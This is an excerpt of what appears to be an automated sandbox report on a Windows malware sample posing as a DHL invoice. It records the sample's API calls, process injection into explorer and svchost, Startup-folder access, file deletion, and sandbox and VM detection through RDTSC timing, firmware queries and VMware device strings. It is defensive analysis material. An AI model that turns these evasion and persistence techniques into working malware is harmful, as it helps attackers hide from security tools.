Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_0063F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	2_2_0063F98E
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_006B1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	2_2_006B1C41

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\AppData\Local\directory\name.exe	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep			graph_0-97284

Query firmware table information (likely to detect VMs)

Source: C:\Windows\explorer.exe

System information queried: FirmwareTableInformation

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\directory\name.exe	API/Special instruction interceptor: Address: 1DE3264
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFBCB7AD324
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFBCB7B0774
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFBCB7B0154
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFBCB7AD8A4
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFBCB7ADA44
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFBCB7AD1E4
Source: C:\Users\user\AppData\Local\directory\name.exe	API/Special instruction interceptor: Address: B43264
Source: C:\Windows\SysWOW64\explorer.exe	API/Special instruction interceptor: Address: 7FFBCB7AD324
Source: C:\Windows\SysWOW64\explorer.exe	API/Special instruction interceptor: Address: 7FFBCB7B0774
Source: C:\Windows\SysWOW64\explorer.exe	API/Special instruction interceptor: Address: 7FFBCB7AD944
Source: C:\Windows\SysWOW64\explorer.exe	API/Special instruction interceptor: Address: 7FFBCB7AD504
Source: C:\Windows\SysWOW64\explorer.exe	API/Special instruction interceptor: Address: 7FFBCB7AD544
Source: C:\Windows\SysWOW64\explorer.exe	API/Special instruction interceptor: Address: 7FFBCB7AD1E4
Source: C:\Windows\SysWOW64\explorer.exe	API/Special instruction interceptor: Address: 7FFBCB7B0154
Source: C:\Windows\SysWOW64\explorer.exe	API/Special instruction interceptor: Address: 7FFBCB7AD8A4
Source: C:\Windows\SysWOW64\explorer.exe	API/Special instruction interceptor: Address: 7FFBCB7ADA44

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe	RDTSC instruction interceptor: First address: 3209904 second address: 320990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe	RDTSC instruction interceptor: First address: 3209B7E second address: 3209B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mstsc.exe	RDTSC instruction interceptor: First address: 2B19904 second address: 2B1990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mstsc.exe	RDTSC instruction interceptor: First address: 2B19B7E second address: 2B19B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\explorer.exe

File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 3_2_00409AB0 rdtsc

3_2_00409AB0

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 2108	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 7829	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 854	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 834	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Window / User API: threadDelayed 794	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Window / User API: threadDelayed 9178	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 549
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 536

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	API coverage: 3.7 %
Source: C:\Users\user\AppData\Local\directory\name.exe	API coverage: 3.9 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 2.0 %

Source: C:\Windows\explorer.exe TID: 3832	Thread sleep time: -4216000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3832	Thread sleep time: -15658000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 5672	Thread sleep count: 794 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 5672	Thread sleep time: -1588000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 5672	Thread sleep count: 9178 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 5672	Thread sleep time: -18356000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0046DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0046DBBE
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0043C2A2 FindFirstFileExW,	0_2_0043C2A2
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_004768EE FindFirstFileW,FindClose,	0_2_004768EE
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0047698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0047698F
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0046D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0046D076
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0046D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0046D3A9
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_00479642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00479642
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0047979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0047979D
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_00479B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00479B2B
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_00475C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00475C97
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_0068DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	2_2_0068DBBE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_0065C2A2 FindFirstFileExW,	2_2_0065C2A2
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_006968EE FindFirstFileW,FindClose,	2_2_006968EE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_0069698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	2_2_0069698F
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_0068D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_0068D076
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_0068D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_0068D3A9
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_00699642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00699642
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_0069979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_0069979D
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_00699B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	2_2_00699B2B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_00695C97 FindFirstFileW,FindNextFileW,FindClose,	2_2_00695C97

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_004042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_004042DE

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior

Source: explorer.exe, 00000015.00000003.2397199751.0000000007739000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware Virtual USB Mouse
Source: explorer.exe, 00000004.00000002.2346753313.0000000009330000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}F
Source: explorer.exe, 00000015.00000003.2441187379.000000000C2E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000D&@v
Source: explorer.exe, 00000015.00000003.2441187379.000000000C2E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&Rs
Source: explorer.exe, 00000004.00000002.2339985971.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00=
Source: explorer.exe, 00000004.00000000.1457725429.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2346753313.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2397231985.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2691561420.0000000009239000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2397384870.0000000009244000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2691561420.00000000092A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000015.00000003.2441187379.000000000C2E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000004.00000000.1457725429.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2346753313.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2284163975.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000004.00000003.2284163975.000000000926A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: wscript.exe, 00000008.00000002.1575785785.0000026229712000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\~%vW9
Source: explorer.exe, 00000004.00000000.1457725429.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2346753313.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2284163975.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en\volume.inf_loc
Source: explorer.exe, 00000004.00000002.2339985971.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000004.00000003.2284163975.000000000926A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTcaVMWare
Source: explorer.exe, 00000015.00000003.2441187379.000000000C2E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000@v
Source: explorer.exe, 00000015.00000002.2689644828.0000000009009000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: explorer.exe, 00000015.00000002.2667973410.0000000000C50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000_IDENTIFIER=Intel64 Family 6 ModWs
Source: explorer.exe, 00000015.00000002.2698810069.000000000C17C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000$
Source: explorer.exe, 00000015.00000002.2689644828.00000000090B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212`yh
Source: explorer.exe, 00000015.00000003.2397115154.0000000007741000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: wsPVMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Devicet\AppData\Local\M
Source: explorer.exe, 00000015.00000002.2689644828.0000000009009000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963Ds
Source: wscript.exe, 00000008.00000002.1575785785.0000026229712000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]_
Source: explorer.exe, 00000015.00000002.2667973410.0000000000C50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
